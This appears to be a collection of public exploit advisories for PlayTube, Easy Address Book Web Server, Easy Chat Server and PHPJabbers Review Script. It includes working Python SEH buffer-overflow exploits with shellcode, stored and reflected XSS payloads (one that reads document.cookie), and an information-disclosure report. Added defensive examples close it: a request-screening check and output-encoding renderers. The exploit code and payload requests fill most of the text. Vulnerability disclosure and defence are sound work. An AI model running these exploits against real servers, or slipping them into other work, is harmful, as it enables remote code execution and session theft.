<pre><code># Exploit Title: PlayTube 3.0.1 - Redirect Information Disclosure<br /># Exploit Author: CraCkEr<br /># Date: 19/08/2023<br /># Vendor: PlayTube<br /># Vendor Homepage: https://playtubescript.com/<br /># Software Link: https://demo.playtubescript.com/<br /># Tested on: Windows 10 Pro<br /># Impact: Sensitive Information Leakage<br /># CVE: CVE-2023-4714<br /># CWE: CWE-200 - CWE-284 - CWE-266<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />Information disclosure in the redirect responses: when any page on the website is accessed,<br />sensitive data, such as app IDs, is exposed in the body of the redirect response.<br /><br /><br />## Steps to Reproduce:<br /><br />Visit most pages on the website, for example the index page:<br /><br />https://website/<br /><br />The body of the response leaks the "RazorPay Payment" ID key:<br /><br />+--------------------------------------+<br />razorpay_options = {<br /> key: "rzp_test_ruz***********"<br />+--------------------------------------+<br /><br /><br />Note: the leaked value is the app ID key that was entered under "Payment Configuration" in the Administration Panel.<br /><br />The "Payment Configuration" settings are in the Administration Panel at this path:<br /><br />https://website/admin-cp/payment-settings<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Easy Address Book Web Server v1.6 - Multiple Vulnerabilities<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2021-01-10<br /># CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493<br /># Vendor Homepage: http://www.efssoft.com/web-address-book-server.html<br /># Software Link : http://www.efssoft.com/eabws.exe (md5sum: 69f77623bb32589fb5343f598b61bbd9)<br /># Tested Version: 1.6<br /># Tested on: Windows 7, 10<br /><br /># CVE-2023-4491: Vulnerability Type: searchbook Remote Buffer Overflow<br /><br />CVSS v3: 9.8<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-119<br /><br /><br />Vulnerability description: There is a remote stack-based buffer overflow<br />(SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6.<br />By sending an overly long string in the name parameter of a POST request to<br />/searchbook.ghp, an attacker may be able to execute arbitrary code.<br /><br />Proof of concept:<br /><br />import socket<br />import struct<br /><br />def sendbuff():<br /> # > arwin.exe kernel32.dll WinExec<br /> # WinExec is located at 0x776f2c91 in kernel32.dll<br /> shellcode_WinExec = (<br />"\x33\xc0" # XOR EAX,EAX<br />"\x50" # PUSH EAX => padding for lpCmdLine<br />"\x68\x2E\x65\x78\x65" # PUSH ".exe"<br />"\x68\x63\x61\x6C\x63" # PUSH "calc"<br />"\x8B\xC4" # MOV EAX,ESP<br />"\x6A\x01" # PUSH 1<br />"\x50" # PUSH EAX<br />"\xBB\x91\x2c\x6f\x77" # MOV EBX,kernel32.WinExec<br />"\xFF\xD3") # CALL EBX<br /><br /> shellcode_system = (<br /> "\x31\xC9" # xor ecx,ecx<br /> "\x51" # push ecx<br /> "\x68\x63\x61\x6C\x63" # push 0x636c6163<br /> "\x54" # push dword ptr esp<br /> "\xB8\x6f\xb1\xdc\x75" # mov eax,msvcrt.system<br /> "\xFF\xD0") # call eax<br /><br /> shellcode = shellcode_WinExec<br /> # SEH<br /> junk1 = "A"*455<br /> buffer = junk1<br /> buffer += "\xeb\x10\x90\x90" # jmp 0x10 to nops to shellcode<br /> buffer += struct.pack('<L',0x1001071e) # pop/pop/ret @ 0x1001071e SSLEAY32.DLL from !Mona<br /> buffer += "\x90" * 20<br /> buffer += shellcode<br /> junk2 = "D"*(840 - 455 - len(shellcode) - 4 - 4 - 20)<br /> buffer += junk2<br /> return buffer<br /><br /><br />def REQ_POST (padding):<br /> POST = (<br /> "POST http://"+str(ip)+"/searchbook.ghp?id=1 HTTP/1.1\r\n"<br /> "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\n"<br /> "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"<br /> "Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\n"<br /> "Content-Type: application/x-www-form-urlencoded\r\n"<br /> "Content-Length: " + str(108 + len(padding))+ "\r\n"<br /> "Connection: keep-alive\r\n"<br /> "Referer: http://"+str(ip)+"/searchcontact.ghp?id=1\r\n"<br /> "Cookie: SESSIONID=3938; UserID=; PassWD=\r\n"<br /> "Upgrade-Insecure-Requests: 1\r\n"<br /> "Host: "+str(ip)+"\r\n\r\n"<br /> "addrbookid=1&contactid=%3C%21--cid--%3E&cancelflag=0&name=" + padding +<br /> "&cancelflag=0&name=AAA&Email=&address=&phone=&other=&search=Start+Search\r\n\r\n"<br /> )<br /> return POST<br /><br />ip = '192.168.X.X'<br />port = 80<br />payload = sendbuff()<br /><br />try:<br /> print "\n[*] Sending POST (searchbook.ghp) exploit to Easy Address Book Web Server V1.6, length " + str(len(payload))<br /> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> s.connect((ip, port))<br /> s.send(REQ_POST(payload))<br /> s.recv(1024)<br /> s.close()<br /> print "\n[*] Sent POST length " + str(len(payload))<br />except:<br /> print "Connecting error"<br /><br /><br /><br /># CVE-2023-4492: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Easy Address Book Web Server v1.6 does not<br />sufficiently encode user-controlled inputs, resulting in a stored<br />Cross-Site Scripting (XSS) vulnerability via the /addrbook.ghp (POST<br />method), in multiple parameters.<br /><br />Proof of concept:<br /><br />POST http://localhost/addrbook.ghp?id=1 HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 475<br />Origin: http://localhost<br />Connection: keep-alive<br />Referer: http://localhost/editcontact.ghp?id=1&cid=12<br />Cookie: SESSIONID=15337; UserID=; PassWD=<br />Upgrade-Insecure-Requests: 1<br />Host: localhost<br /><br />addrbookid=1&contactid=14&cancelflag=0&firstname=%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E&middlename=demo1&lastname=demo1&nickname=demo1&Email=demo1%40demo1.com&company=demo1&jobtitle=demo1&department=demo1&office=demo1&workphone=&workfax=&workaddress=demo1&workcity=&workstate=&workzip=&workcountry=USA&homephone=&homefax=&homeaddress=demo1&homecity=&homestate=&homezip=&homecountry=USA&mobilephone=&pager=&email2=&email3=&homepage=&notes=demo1&save=Save<br /><br />Vulnerable parameters: firstname, homephone, lastname, middlename,<br />workaddress, workcity, workcountry, workphone, workstate, workzip<br /><br />Response:<br /><br /> <TR><br /> <TD class=row2><SPAN class=genmed><A target=_blank<br />class=genmed href="viewcontact.ghp?id=1&cid=12">demo1<br /></a><script>alert(1);</script><a> demo1</A></SPAN></TD><br /> <TD class=row2 align=left><SPAN class=genmed><a href="mailto:<br />demo1@demo1.com">demo1@demo1.com</a></SPAN></TD><br /> <TD class=row2 align=left><SPAN class=genmed></SPAN></TD><br /> <TD class=row2 align=left><SPAN class=genmed></SPAN></TD><br /> <TD class=row2 align=left><SPAN class=genmed>demo1, , , ,<br />USA</SPAN></TD><br /> <TD class=row2 align=left><SPAN class=genmed><a<br 
/>href="editcontact.ghp?id=1&cid=12">Edit</a></SPAN></TD><br /> <TD class=row2 align=left><SPAN class=genmed><a<br />href="javascript:deletecontact('deletecontact.ghp?id=1&cid=12','demo1<br /></a><script>alert(1);</script><a> demo1')">Delete</a></SPAN></TD><br /><br /><br /><br /># CVE-2023-4493: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2<br /><br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Easy Address Book Web Server v1.6 does not<br />sufficiently encode user-controlled inputs, resulting in a stored<br />Cross-Site Scripting (XSS) vulnerability via the /users_admin.ghp (POST<br />method, authenticated Admin user), in multiple parameters.<br /><br />Proof of concept:<br /><br />Example 1:<br /><br />POST http://localhost/users_admin.ghp HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 134<br />Origin: http://localhost<br />Connection: keep-alive<br />Referer: http://localhost/users_admin.ghp<br />Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted><br />Upgrade-Insecure-Requests: 1<br />Host: localhost<br /><br />userid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=Update<br /><br />Vulnerable parameter: email<br /><br />Response:<br /><br /><form method="POST" action=""><br /><TR><br /><input type="hidden" name="userid" value="2"><br /><TD class=row2 align=left><input type="text" name="username" size="15"<br />value="test"> </TD><br /><TD class=row2 align=left><input type="text" name="password" size="15"<br />value=""> </TD><br /><TD class=row2 align=left><input type="text" name="email" size="35"<br 
/>value=""><script>alert(1);</script>"> </TD><br /><TD class=row2 align=left><select name="level"><option<br />>guest</option><option selected>user</option><option >power<br />user</option></select></TD><br /><TD class=row2 align=left><select name="state"><option<br />selected>Enable</option><option >Disable</option></select></TD><br /><TD class=row2 align=left><input type="submit" value="Update"<br />name="update_user"></TD><br /><TD class=row2><SPAN class=genmed><A class=genmed<br />href="user_delete_admin.ghp?2">Delete</A></SPAN></TD><br /></TR><br /></form><br /><br />Example 2:<br /><br />POST http://localhost/users_admin.ghp HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 144<br />Origin: http://localhost<br />Connection: keep-alive<br />Referer: http://localhost/users_admin.ghp<br />Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted><br />Upgrade-Insecure-Requests: 1<br />Host: localhost<br /><br />userid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt%40fsdfs.com&level=user&state=Enable&update_user=Update<br /><br />Vulnerable parameter: username<br /><br />Response:<br /><br /><form method="POST" action=""><br /><TR><br /><input type="hidden" name="userid" value="2"><br /><TD class=row2 align=left><input type="text" name="username" size="15"<br />value=""><script>alert(1);</script>"> </TD><br /><TD class=row2 align=left><input type="text" name="password" size="15"<br />value=""> </TD><br /><TD class=row2 align=left><input type="text" name="email" size="35" value="<br />tt@fsdfs.com"> </TD><br /><TD class=row2 align=left><select name="level"><option<br />>guest</option><option selected>user</option><option >power<br 
/>user</option></select></TD><br /><TD class=row2 align=left><select name="state"><option<br />selected>Enable</option><option >Disable</option></select></TD><br /><TD class=row2 align=left><input type="submit" value="Update"<br />name="update_user"></TD><br /><TD class=row2><SPAN class=genmed><A class=genmed<br />href="user_delete_admin.ghp?2">Delete</A></SPAN></TD><br /></TR><br /></form><br /><br />-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /># Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2021-01-09<br /># CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497<br /># Vendor Homepage: http://www.echatserver.com/<br /># Software Link : http://echatserver.com/ecssetup.exe (md5sum: c682138ebbea9af7948a3f142bbd054b)<br /># Tested Version: 3.1<br /># Tested on: Windows 7, 10<br /><br /># CVE-2023-4494: Vulnerability Type: register Remote Buffer Overflow<br /><br />CVSS v3: 9.8<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-119<br /><br /><br />Vulnerability description: There is a remote stack-based buffer overflow<br />(SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1.<br />By sending an overly long string in the username parameter of a GET request<br />to register.ghp, an attacker may be able to execute arbitrary code.<br /><br />Proof of concept:<br /><br />import socket<br /><br />def sendbuff():<br /> # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/<br /> # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin<br /> # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)<br /> shellcode = (<br /> "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +<br /> "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +<br /> "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +<br /> "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +<br /> "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +<br /> "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +<br /> "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +<br /> "\x1c\x39\xbd"<br /> )<br /><br /> # SEH<br /> junk1 = "A"*473<br /> buffer = junk1<br /> buffer += "\xeb\x06\x90\x90" # short jmp to shellcode<br /> buffer += "\x1e\x0e\x01\x10" # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL from !Mona<br /> buffer += shellcode<br /> junk2 = "D"*(600 - 473 - len(shellcode) - 4 - 4)<br /> buffer += junk2<br /><br /> return buffer<br /><br /><br />def REQ_GET (padding):<br /> GET = (<br /> "GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n"<br /> "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n"<br /> "Host: "+str(ip)+":80\r\n"<br /> "Accept-Language: es-es\r\n"<br /> "Accept-Encoding: gzip, deflate\r\n"<br /> "Referer: http://"+str(ip)+"\r\n"<br /> "Connection: Keep-Alive\r\n\r\n"<br /> )<br /> return GET<br /><br />ip = '192.168.X.X' # change the ip address<br />port = 80<br />payload = sendbuff()<br /><br />try:<br /> print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server 3.1, length " + str(len(payload))<br /> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> s.connect((ip, port))<br /> s.send(REQ_GET(payload))<br /> s.recv(1024)<br /> s.close()<br /> print "\n[*] Sent GET length " + str(len(payload))<br />except:<br /> print "Connection error"<br /><br /><br /><br /># CVE-2023-4495: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Easy Chat Server v3.1 does not sufficiently<br />encode user-controlled inputs, resulting in a stored<br />
Cross-Site Scripting<br />(XSS) vulnerability via the /registresult.htm (POST method), in the Resume<br />parameter. The XSS is loaded from /register.ghp.<br /><br />Proof of concept:<br /><br />POST http://localhost/registresult.htm HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 257<br />Origin: http://localhost<br />Connection: keep-alive<br />Referer: http://localhost/register.ghp?username=<redacted>&password=<redacted><br />Upgrade-Insecure-Requests: 1<br />Host: localhost<br /><br />UserName=<redacted>&Password=<redacted>&Password1=demo1&Sex=0&Email=demo1%25252540demo1.com&Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change<br /><br />Response:<br /><BODY bgcolor="#b8d0dc"><center>Congratulations!<br />
Your information has been<br />changed successfully.</center></body><br /><br /><br />Go to:<br />http://localhost/register.ghp?username=<redacted>&password=<redacted><br /><br />Response - XSS:<br /><TR><TD><br />Your profile/interests:<BR><br /><TEXTAREA rows="4" cols="30"<br />name="Resume"></TEXTAREA><script>alert(1)</script><TEXTAREA></TEXTAREA><br /><INPUT type="hidden" name="cw" value="0"><br /><INPUT type="hidden" name="RoomID" value="<!--$RoomID-->"><br /><INPUT type="hidden" name="RepUserName" value="<!--$UserName-->"><br /></TD></TR><br /><br /># CVE-2023-4496: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2<br /><br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Easy Chat Server v3.1 does not sufficiently<br />encode user-controlled inputs, resulting in a stored Cross-Site Scripting<br />(XSS) vulnerability via the /body2.ghp (POST method), in the mtowho parameter.<br /><br /><br />Proof of concept:<br /><br />POST http://localhost/body2.ghp?username=<redacted>&password=<redacted>&room=4 HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 248<br />Origin: http://localhost<br />Connection: keep-alive<br />Referer: http://localhost/chatsubmit.ghp?username=<redacted>&password=<redacted>&room=4<br />Upgrade-Insecure-Requests: 1<br />Host: localhost<br /><br />staticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message=demo+&chat_flag=<br /><br /><br />Response:<br /><html><br /><head><br /></head><br /><body><br /><script 
language="JavaScript"><br /><!--<br />parent.board.document.body.innerHTML=parent.board.document.body.innerHTML+"<br><font<br />color=green size=2>08:22:16 <a target=chatsubmit<br />href=javascript:parent.chatsubmit.getname('<redacted>');><redacted></a> =><br /><a target=chatsubmit<br />href=javascript:parent.chatsubmit.getname('</script><script>alert(1);</script><script>');></script><script>alert(1);</script><script></a><br /></font><font color=#000000 size=2>demo </font> <img src=/face/100.gif<br />border=0>";<br />// --><br /></script><br /></body><br /></html><br /><br /><br /># CVE-2023-4497: Vulnerability Type: stored Cross-Site Scripting (XSS) - #3<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Easy Chat Server v3.1 does not sufficiently<br />encode user-controlled inputs, resulting in a stored Cross-Site Scripting<br />(XSS) vulnerability via the /registresult.htm (POST method), in the Icon<br />parameter. The XSS is loaded from /users.ghp.<br /><br />Proof of concept:<br /><br />POST /registresult.htm HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 235<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/register.ghp?username=<redacted>&password=<redacted><br />Upgrade-Insecure-Requests: 1<br /><br />UserName=<redacted>&Password=<redacted>&Password1=<redacted>&Sex=0&Email=<redacted>%252525252540<redacted>.com&Icon="><script>alert(111)</script><img%20src="1.gif&Resume=AAA&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change<br /><br />Response:<br /><BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been<br />changed successfully.</center></body><br /><br />When the user information page loads:<br /><br />http://localhost/users.ghp?username=<redacted>&password=<redacted>&room=4<br /><br />&nbsp;<font color="red">[vip room]</font><br /><br><br><br />[Online users:1]<br><br>[<a<br />href="javascript:parent.chatsubmit.getname('All');"<br />target="chatsubmit">All</a>]<br /><br><br><br /><script><br />if(navigator.appName!="Netscape" && parent.chatsubmit.document &&<br />parent.chatsubmit.document.readyState == "complete")<br />parent.chatsubmit.listcolorchange();<br /></script><br /><img src="/images/""><script>alert(111)</script><i>[<a<br />href="javascript:parent.chatsubmit.getname('<redacted>');"<br />target="chatsubmit"><redacted></a>]<==<br><br /><br><br /><br><br><br />[<a href="javascript:OnRegister();">Change infomation</a>]<br /></i><br /><br /></code></pre>
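As an added example written from the defender's side (not code from the advisories above), a request-screening check for the two overflow reports, CVE-2023-4491 and CVE-2023-4494: it parses a raw request the way the PoCs build them and flags a name or username value long enough to reach the SEH record. The watched path list and the 128-byte threshold are assumptions, and the sample requests are constructed.

```python
from urllib.parse import parse_qsl, urlsplit

# Parameters the two overflow advisories above say reach the overrun stack
# buffer, keyed by request path (assumption: these are the only paths watched).
WATCHED = {
    "/searchbook.ghp": {"name"},    # Easy Address Book Web Server, CVE-2023-4491
    "/register.ghp": {"username"},  # Easy Chat Server, CVE-2023-4494
}
# Longest value a real contact or user name should need (assumed threshold;
# the PoCs send 840- and 600-byte values to overwrite the SEH record).
MAX_NAME_LEN = 128


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, query, body).

    The request line may carry an absolute target ("POST http://host/x"),
    as the searchbook PoC does; urlsplit copes with both forms.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    return method, parts.path, parts.query, body.decode("latin-1")


def screen(raw: bytes):
    """Return [(path, param, length), ...] for each watched parameter whose
    decoded value exceeds MAX_NAME_LEN; an empty list means the request is
    clean. GET parameters come from the query string, POST ones from the body.
    """
    method, path, query, body = parse_request(raw)
    watched = WATCHED.get(path, set())
    source = query if method == "GET" else body
    findings = []
    # keep_blank_values so the empty "password=" in the register PoC survives
    for key, value in parse_qsl(source, keep_blank_values=True):
        if key in watched and len(value) > MAX_NAME_LEN:
            findings.append((path, key, len(value)))
    return findings


# Constructed sample requests modelled on the PoCs (padding only, no shellcode).
BENIGN = (b"POST http://192.0.2.10/searchbook.ghp?id=1 HTTP/1.1\r\n"
          b"Host: 192.0.2.10\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
          b"addrbookid=1&contactid=1&cancelflag=0&name=Rafael&search=Start+Search")
OVERLONG_POST = (b"POST http://192.0.2.10/searchbook.ghp?id=1 HTTP/1.1\r\n"
                 b"Host: 192.0.2.10\r\n\r\n"
                 b"addrbookid=1&cancelflag=0&name=" + b"A" * 840 + b"&name=AAA")
OVERLONG_GET = (b"GET /register.ghp?username=" + b"A" * 600 +
                b"&password= HTTP/1.1\r\nHost: 192.0.2.10:80\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("post", OVERLONG_POST), ("get", OVERLONG_GET)):
        print(label, screen(req))
```

The same check works as a WAF rule or as a log-replay filter over captured requests; the length it measures is the decoded value, so percent-encoded padding does not slip under the threshold.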
<pre><code>## Title: PHPJabbers PHP Review Script 1.0 - Reflected XSS<br />## Author: nu11secur1ty<br />## Date: 08/31/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/php-review-script/<br />## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected<br /><br />## Description:<br />The value of the `action` request parameter is copied into the HTML<br />document as plain text between tags. The payload `aelll<img src=a<br />onerror=alert(1)>nx0ib` was submitted in the `action` parameter and was<br />echoed unmodified in the application's response. The attacker can steal<br />the PHPSESSID cookie.<br /><br />STATUS: HIGH severity vulnerability<br /><br />[+]Exploit:<br />```GET<br />GET /1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionPostaelll%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3enx0ib HTTP/1.1<br />Host: demo.phpjabbers.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: _ga=GA1.2.221094441.1693486538; _gid=GA1.2.1044601458.1693486538; _gat=1; _fbp=fb.1.1693486538348.177361623; _ga_NME5VTTGTT=GS1.2.1693486538.1.1.1693486541.57.0.0<br />Upgrade-Insecure-Requests: 1<br />Referer: http://demo.phpjabbers.com/1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionIndex&pjPage=1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 0<br />```<br /><br />## Reproduce:<br 
/>[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Review-Script-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/08/phpjabbers-php-review-script-10-xss.html)<br /><br />## Time spent:<br />01:05:00<br /><br /><br /></code></pre>
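The stored XSS reports above (CVE-2023-4492 and CVE-2023-4493 in Easy Address Book Web Server, CVE-2023-4495 to CVE-2023-4497 in Easy Chat Server) and the reflected PHPJabbers issue all come down to missing output encoding. As an added example that is not part of any of these advisories, the vulnerable fragments are rebuilt here in Python with encoding chosen per context: text node, double-quoted attribute, and a JavaScript string nested inside an attribute (the Delete link). The function names are assumptions, and the form bodies are constructed from the PoC payloads.

```python
import html
import json
from urllib.parse import parse_qs

# Constructed form bodies carrying the exact payloads from the PoCs above.
ADDRBOOK_BODY = ("addrbookid=1&contactid=14&cancelflag=0&firstname="
                 "%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E"
                 "&lastname=demo1")
USERS_ADMIN_BODY = ("userid=2&username=test&password=test"
                    "&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E")
REVIEW_ACTION = "pjActionPostaelll<img src=a onerror=alert(document.cookie)>nx0ib"


def field(body: str, name: str) -> str:
    """First value of a form field, percent-decoded as the server would see it."""
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]


def render_contact_cell(first: str, last: str, cid: int) -> str:
    """addrbook.ghp contact cell: the name is a text node, so html.escape
    turns </a><script> into inert &lt;/a&gt;&lt;script&gt;."""
    name = html.escape(f"{first} {last}", quote=True)
    return (f'<A target=_blank class=genmed href="viewcontact.ghp?id=1&amp;cid={int(cid)}">'
            f"{name}</A>")


def render_user_inputs(username: str, email: str) -> str:
    """users_admin.ghp edit form: each value sits in a double-quoted attribute,
    so the closing quote in "><script> must become &quot; (quote=True)."""
    u, e = html.escape(username, quote=True), html.escape(email, quote=True)
    return (f'<input type="text" name="username" size="15" value="{u}">'
            f'<input type="text" name="email" size="35" value="{e}">')


def render_delete_link(first: str, last: str, cid: int) -> str:
    """The Delete link nests the name in a JavaScript string inside an attribute:
    encode for JS first (json.dumps, plus < as \\u003c so no tag can form after
    the browser decodes the attribute), then for the attribute context."""
    js_name = json.dumps(f"{first} {last}").replace("<", "\\u003c")
    call = f"deletecontact('deletecontact.ghp?id=1&cid={int(cid)}',{js_name})"
    return f'<a href="javascript:{html.escape(call, quote=True)}">Delete</a>'


def render_action_error(action: str) -> str:
    """Reflected case from the PHP Review Script advisory: the unknown action
    name is echoed as plain text between tags, so text-node escaping is enough."""
    return f"<p>Unknown action: {html.escape(action, quote=True)}</p>"
```

Each renderer takes the already-decoded value and escapes at output time, which is what the vulnerable pages skip; input filtering alone would not have covered the three different contexts shown.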